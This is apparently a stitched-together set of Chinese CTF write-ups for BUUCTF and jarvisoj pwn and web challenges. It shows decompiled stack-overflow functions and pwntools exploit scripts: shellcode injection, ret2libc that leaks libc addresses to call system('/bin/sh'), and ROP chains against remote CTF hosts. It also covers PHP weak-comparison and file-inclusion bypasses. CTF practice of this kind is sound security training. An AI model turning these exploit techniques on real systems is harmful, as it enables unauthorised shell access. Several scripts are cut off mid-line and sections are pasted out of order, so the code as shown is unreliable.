[TOC]
0x30.jarvisoj_level1
// Decompiled target as quoted in the write-up. The stack buffer holds 136 bytes,
// but read() is allowed up to 0x100 (256) bytes, so input longer than the buffer
// overruns it; the printf on the line before also prints buf's stack address.
// (Bounding the read to sizeof(buf) and not printing stack addresses would fix both.)
ssize_t vulnerable_function()
{
    char buf[136]; // [esp+0h] [ebp-88h] BYREF
    printf("What's this:%p?\n", buf);
    return read(0, buf, 0x100u);
}
tmd,这题给的题目和平台的题不太一样,正常这道题的exp:
# Author's script for the local binary. Python 2 / pwntools syntax
# (`print hex(...)`, str payloads) -- it will not run unchanged under Python 3.
from pwn import *
context(log_level='debug')
io = process("./level1")
##io = remote("node4.buuoj.cn",29905)
buf_addr = int(io.recv()[-12:-2],16)
payload = asm(shellcraft.sh())
payload +=(0x88+4-len(asm(shellcraft.sh())))*'a' + p32(buf_addr)
print hex(buf_addr)
io.sendline(payload)
io.interactive()
只能ret2libc了:
# Second script (ret2libc variant for the remote instance); truncated in this excerpt.
from pwn import *
context(log_level='debug')
##io = process("./level1")
elf = ELF("./level1")
libc = ELF("./libc-2.23.so")
io = remote("node4.buuoj.cn",29905)
payload =
[TOC]
0x20.jarvisoj_level3_x64
ret2libc
# Author's ret2libc script. Python 2 / pwntools syntax (`print hex(...)`, str
# payloads, `.next()` on the search() iterator) -- it will not run unchanged under
# Python 3. The two gadget addresses below are hard-coded for this particular binary.
from pwn import *
context(log_level='debug')
##io = process("./level3_x64")
io = remote("node3.buuoj.cn",29779)
elf = ELF("./level3_x64")
libc = ELF("./libc-x64-2.23.so")
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = elf.sym['main']
pop_rdi_ret = 0x4006b3
pop_rsi_r15_ret = 0x4006b1
io.recv()
payload = 'a'*(0x88)+ p64(pop_rdi_ret)+p64(1)
payload += p64(pop_rsi_r15_ret) +p64(read_got)+p64(8)+p64(write_plt)+ p64(main_addr)
io.sendline(payload)
read_add = u64(io.recv()[0:8])
print hex(read_add)
base = read_add - libc.symbols["read"]
sys_add = base + libc.symbols["system"]
bin_sh = base + libc.search("/bin/sh").next()
payload = 'a'*(0x88)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys_add)+p64(main_addr)
io.sendline(payload)
io.interactive()
0x21.picoctf_2018_rop chain
win1():
// Decompiled: sets the global flag win1.
void win_function1()
{
    win1 = 1;
}
win2():
// Decompiled (truncated in this excerpt): sets win2 only when win1 is already set
// and the argument equals 0xBAAAAAAD; otherwise prints an error when win1 is set.
int __cdecl win_function2(int a1)
{
    int result; // eax
    result = (unsigned __int8)win1;
    if ( win1 && a1 == 0xBAAAAAAD )
    {
        win2 = 1;
    }
    else if ( win1 )
    {
        result = puts("Wrong Argument. Try Again.");
    }
    else
0x1.test_your_nc nc一下就完事。 0x2.rip checksec: yutao@pwnbaby:~/Desktop$ checksec pwn1 [*] '/home/yutao/Desktop/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segmentsida打开,有个后门函数:fun() 双击s到stack of main,15字节,exp: from pwn import * io = process("./pwn1") payload = 'a'*(0xf + 8) + p64(0x40118a) ##具体86还是87/8a
[TOC]
0x10.[HarekazeCTF2019]baby_rop
没后门函数:
// Decompiled target. v4 is a 16-byte stack buffer filled by scanf("%s") with no
// length limit, so any input longer than 15 bytes overruns it (a field width such
// as "%15s" would bound the read).
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4[16]; // [rsp+0h] [rbp-10h] BYREF
    system("echo -n \"What's your name? \"");
    __isoc99_scanf("%s", v4);
    printf("Welcome to the Pwn World, %s!\n", v4);
    return 0;
}
# Author's script. Python 2 / pwntools syntax (str payloads); the two addresses
# below are hard-coded for this particular binary.
from pwn import *
context(log_level='DEBUG')
##io = process("./babyrop")
io = remote('node3.buuoj.cn',28280)
elf = ELF('./babyrop')
io.recv()
sys_plt = elf.plt["system"]
pop_rdi_ret =0x0400683
bin_sh = 0x0601048
payload = 'a'*0x18+ p64(pop_rdi_ret)+p64(bin_sh)+p64(sys_plt)+p64(0xdeadbeef)
io.sendline(payload)
io.interactive()
0x11.jarvisoj_level2_x64
// Decompiled target: buf is 128 bytes, but read() accepts up to 0x200 (512) bytes,
// so longer input overruns the buffer.
ssize_t vulnerable_function()
{
    char buf[128]; // [rsp+0h] [rbp-80h] BYREF
    system("echo Input:");
    return read(0, buf, 0x200uLL);
}
有/bin/sh字符串,没啥写的。
# Author's script for level2_x64; truncated in this excerpt.
from pwn import *
##io = process("./level2_x64")
io = remote('node3.buuoj.cn',28783)
elf = ELF("./level2_x64")
io.recv()
sys_plt =
0x10.[ACTF2020 新生赛]Upload
和之前的一个一样,改个后缀名就OK。
0x11.[ACTF2020 新生赛]BackupFile
可以简单扫下,发现index.php.bak
<?php
include_once "flag.php";
if(isset($_GET['key'])) {
    $key = $_GET['key'];
    // Non-numeric input is rejected, then the value is cast to int.
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    // Loose (==) comparison of an int against a non-numeric string. In PHP 7 and
    // earlier the string side is converted to a number (its leading digits), so
    // this is much weaker than an exact match; a strict comparison (===) against
    // the intended value would close it. PHP 8 changed int-vs-non-numeric-string
    // comparison to compare as strings, so the behaviour depends on the PHP version.
    if($key == $str) {
        echo $flag;
    }
} else {
    echo "Try to find out source file!";
}
str弱相等,被转化为整形 传参ke
[TOC] 0x1.[HCTF 2018]WarmUp 代码审计+文件包含 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); /*这里mb_sustr 是个截断,返回0到mb_strpos之间的内容,而mb_strps 则是查找第一次出现的位置, 所以基本可以